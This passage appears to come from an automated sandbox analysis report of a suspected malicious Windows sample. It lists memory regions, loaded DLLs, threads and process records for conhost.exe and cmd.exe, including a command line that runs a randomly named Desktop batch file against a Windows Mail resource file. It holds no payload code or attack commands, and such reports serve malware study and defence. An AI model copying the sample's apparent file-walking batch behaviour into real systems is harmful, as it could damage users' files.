0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6461 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 6511 start_va = 0x18473a0000 end_va = 0x18473a6fff entry_point = 0x0 region_type = private name = "private_0x00000018473a0000" filename = "" Region: id = 6512 start_va = 0x1848ae0000 end_va = 0x1848ae4fff entry_point = 0x1848ae0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 6513 start_va = 0x1848bc0000 end_va = 0x1848bcffff entry_point = 0x0 region_type = private name = "private_0x0000001848bc0000" filename = "" Region: id = 6514 start_va = 0x1848af0000 end_va = 0x1848af0fff entry_point = 0x1848af0000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 6515 start_va = 0x1848b00000 end_va = 0x1848b01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001848b00000" filename = "" Region: id = 6516 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 6517 start_va = 0x1848b10000 end_va = 0x1848b10fff entry_point = 0x1848b10000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 6518 start_va = 0x1848b20000 end_va = 0x1848b21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001848b20000" filename = "" Region: id = 6519 start_va = 0x1848b10000 end_va = 0x1848b10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001848b10000" filename = "" Thread: id = 800 os_tid = 0xb28 Thread: id = 808 os_tid = 0xe40 Thread: id = 811 os_tid = 0xe30 Thread: id = 820 os_tid = 0x538 Process: id = "87" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2252f000" os_pid = "0xef8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "83" os_parent_pid = "0xe4c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6215 start_va = 0x7f8b7000 end_va = 0x7f8b7fff entry_point = 0x0 region_type = private name = "private_0x000000007f8b7000" filename = "" Region: id = 6216 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6217 start_va = 0x8cb36a0000 end_va = 0x8cb36bffff entry_point = 0x0 region_type = private name = "private_0x0000008cb36a0000" filename = "" Region: id = 6218 start_va = 0x8cb36c0000 end_va = 0x8cb36d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008cb36c0000" filename = "" Region: id = 6219 start_va = 0x8cb36e0000 end_va = 0x8cb371ffff entry_point = 0x0 region_type = private name = "private_0x0000008cb36e0000" filename = "" Region: id = 6220 start_va = 0x7df5ff110000 end_va = 0x7ff5ff10ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff110000" filename = "" Region: id = 6221 start_va = 0x7ff7fd1c0000 end_va = 0x7ff7fd1e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd1c0000" filename = "" Region: id = 6222 start_va = 0x7ff7fd1ec000 end_va = 0x7ff7fd1edfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd1ec000" filename = "" Region: id = 6223 start_va = 0x7ff7fd1ee000 end_va = 0x7ff7fd1eefff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd1ee000" filename = "" Region: id = 6224 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6225 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6226 start_va = 0x8cb36a0000 end_va = 0x8cb36affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008cb36a0000" filename = "" Region: id = 6227 start_va = 0x8cb37a0000 end_va = 0x8cb389ffff entry_point = 0x0 region_type = private name = "private_0x0000008cb37a0000" filename = "" Region: id = 6228 start_va = 0x8cb38a0000 end_va = 0x8cb395dfff entry_point = 0x8cb38a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6229 start_va = 0x7ff7fd0c0000 end_va = 0x7ff7fd1bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd0c0000" filename = "" Region: id = 6230 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6231 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6232 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6233 start_va = 0x8cb3720000 end_va = 0x8cb375ffff entry_point = 0x0 region_type = private name = "private_0x0000008cb3720000" filename = "" Region: id = 6234 start_va = 0x8cb3960000 end_va = 0x8cb3a2ffff entry_point = 0x0 region_type = private name = "private_0x0000008cb3960000" filename = "" Region: id = 6235 start_va = 0x7ff7fd1ea000 end_va = 0x7ff7fd1ebfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd1ea000" filename = "" Region: id = 6236 start_va = 0x8cb36b0000 end_va = 0x8cb36b6fff entry_point = 0x0 region_type = private name = "private_0x0000008cb36b0000" filename = "" Region: id = 6237 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 6238 start_va = 0x8cb3760000 end_va = 0x8cb3760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008cb3760000" filename = "" Region: id = 6239 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6240 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6241 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6242 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6243 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6244 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6245 start_va = 0x8cb3770000 end_va = 0x8cb3776fff entry_point = 0x0 region_type = private name = "private_0x0000008cb3770000" filename = "" Region: id = 6246 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6247 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6248 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6249 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6250 start_va = 0x8cb3a30000 end_va = 0x8cb3bb7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008cb3a30000" filename = "" Region: id = 6251 start_va = 0x8cb3bc0000 end_va = 0x8cb3d40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008cb3bc0000" filename = "" Region: id = 6252 start_va = 0x8cb3d50000 end_va = 0x8cb514ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008cb3d50000" filename = "" Region: id = 6253 start_va = 0x8cb3780000 end_va = 0x8cb3780fff entry_point = 0x0 region_type = private name = "private_0x0000008cb3780000" filename = "" Region: id = 6254 start_va = 0x8cb3790000 end_va = 0x8cb3790fff entry_point = 0x0 region_type = private name = "private_0x0000008cb3790000" filename = "" Region: id = 6255 start_va = 0x8cb5150000 end_va = 0x8cb533ffff entry_point = 0x0 region_type = private name = "private_0x0000008cb5150000" filename = "" Region: id = 6311 start_va = 0x8cb3960000 end_va = 0x8cb399ffff entry_point = 0x0 region_type = private name = "private_0x0000008cb3960000" filename = "" Region: id = 6312 start_va = 0x8cb3a20000 end_va = 0x8cb3a2ffff entry_point = 0x0 region_type = private name = "private_0x0000008cb3a20000" filename = "" Region: id = 6313 start_va = 0x7ff7fd1e8000 end_va = 0x7ff7fd1e9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd1e8000" filename = "" Region: id = 6314 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6315 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6316 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6317 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6318 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6319 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6320 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6321 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6322 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6323 start_va = 0x8cb5150000 end_va = 0x8cb530ffff entry_point = 0x0 region_type = private name = "private_0x0000008cb5150000" filename = "" Region: id = 6324 start_va = 0x8cb5330000 end_va = 0x8cb533ffff entry_point = 0x0 region_type = private name = "private_0x0000008cb5330000" filename = "" Region: id = 6363 start_va = 0x8cb5340000 end_va = 0x8cb5676fff entry_point = 0x8cb5340000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6364 start_va = 0x8cb36e0000 end_va = 0x8cb3700fff entry_point = 0x8cb36e0000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 6365 start_va = 0x8cb39a0000 end_va = 0x8cb39f8fff entry_point = 0x8cb39a0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 6389 start_va = 0x8cb5680000 end_va = 0x8cb5897fff entry_point = 0x0 region_type = private name = "private_0x0000008cb5680000" filename = "" Region: id = 6390 start_va = 0x8cb58a0000 end_va = 0x8cb5ab1fff entry_point = 0x0 region_type = private name = "private_0x0000008cb58a0000" filename = "" Region: id = 6391 start_va = 0x8cb5150000 end_va = 0x8cb525ffff entry_point = 0x0 region_type = private name = "private_0x0000008cb5150000" filename = "" Region: id = 6392 start_va = 0x8cb5300000 end_va = 0x8cb530ffff entry_point = 0x0 region_type = private name = "private_0x0000008cb5300000" filename = "" Region: id = 6393 start_va = 0x8cb5ac0000 end_va = 0x8cb5cd6fff entry_point = 0x0 region_type = private name = "private_0x0000008cb5ac0000" filename = "" Region: id = 6394 start_va = 0x8cb5ce0000 end_va = 0x8cb5df4fff entry_point = 0x0 region_type = private name = "private_0x0000008cb5ce0000" filename = "" Region: id = 6466 start_va = 0x8cb36e0000 end_va = 0x8cb371ffff entry_point = 0x0 region_type = private name = "private_0x0000008cb36e0000" filename = "" Region: id = 6467 start_va = 0x8cb39a0000 end_va = 0x8cb39a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008cb39a0000" filename = "" Region: id = 6468 start_va = 0x7ff7fd1ec000 end_va = 0x7ff7fd1edfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd1ec000" filename = "" Region: id = 6469 start_va = 0x8cb5e00000 end_va = 0x8cb5eb7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008cb5e00000" filename = "" Region: id = 6470 start_va = 0x8cb39a0000 end_va = 0x8cb39a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008cb39a0000" filename = "" Region: id = 6471 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 6472 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6473 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 6536 start_va = 0x8cb39b0000 end_va = 0x8cb39b6fff entry_point = 0x0 region_type = private name = "private_0x0000008cb39b0000" filename = "" Region: id = 6537 start_va = 0x8cb39c0000 end_va = 0x8cb39c4fff entry_point = 0x8cb39c0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 6538 start_va = 0x8cb39d0000 end_va = 0x8cb39d0fff entry_point = 0x8cb39d0000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 6539 start_va = 0x8cb39e0000 end_va = 0x8cb39e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008cb39e0000" filename = "" Region: id = 6540 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 6541 start_va = 0x8cb39f0000 end_va = 0x8cb39f0fff entry_point = 0x8cb39f0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 6542 start_va = 0x8cb3a00000 end_va = 0x8cb3a01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008cb3a00000" filename = "" Region: id = 6543 start_va = 0x8cb39f0000 end_va = 0x8cb39f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008cb39f0000" filename = "" Thread: id = 804 os_tid = 0x6ec Thread: id = 809 os_tid = 0xe44 Thread: id = 810 os_tid = 0xe28 Thread: id = 822 os_tid = 0xf28 Process: id = "88" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1c5d6000" os_pid = "0xf04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6434 start_va = 0xae0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 6435 start_va = 0xb00000 end_va = 0xb01fff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 6436 start_va = 0xb10000 end_va = 0xb23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 6437 start_va = 0xb30000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 6438 start_va = 0xb70000 end_va = 0xc6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 6439 start_va = 0xc70000 end_va = 0xc73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c70000" filename = "" Region: id = 6440 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6441 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 6442 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6443 start_va = 0x7f210000 end_va = 0x7f232fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f210000" filename = "" Region: id = 6444 start_va = 0x7f238000 end_va = 0x7f238fff entry_point = 0x0 region_type = private name = "private_0x000000007f238000" filename = "" Region: id = 6445 start_va = 0x7f23c000 end_va = 0x7f23cfff entry_point = 0x0 region_type = private name = "private_0x000000007f23c000" filename = "" Region: id = 6446 start_va = 0x7f23d000 end_va = 0x7f23ffff entry_point = 0x0 region_type = private name = "private_0x000000007f23d000" filename = "" Region: id = 6447 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6448 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6449 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 6450 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6451 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 6452 start_va = 0xc80000 end_va = 0xc80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 6453 start_va = 0xc90000 end_va = 0xc91fff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 6474 start_va = 0xe60000 end_va = 0xe6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 6475 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6476 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6477 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6478 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6479 start_va = 0xca0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 6594 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6595 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6596 start_va = 0xae0000 end_va = 0xaeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 6597 start_va = 0x7f110000 end_va = 0x7f20ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f110000" filename = "" Region: id = 6944 start_va = 0xe70000 end_va = 0xf2dfff entry_point = 0xe70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6945 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6946 start_va = 0xdb0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 6947 start_va = 0xf30000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 6948 start_va = 0x1030000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 6949 start_va = 0x7f239000 end_va = 0x7f23bfff entry_point = 0x0 region_type = private name = "private_0x000000007f239000" filename = "" Region: id = 6950 start_va = 0xaf0000 end_va = 0xaf3fff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 7284 start_va = 0xb00000 end_va = 0xb03fff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 7321 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 7322 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7323 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7324 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7325 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7326 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7327 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7328 start_va = 0xca0000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 7329 start_va = 0xcb0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 7379 start_va = 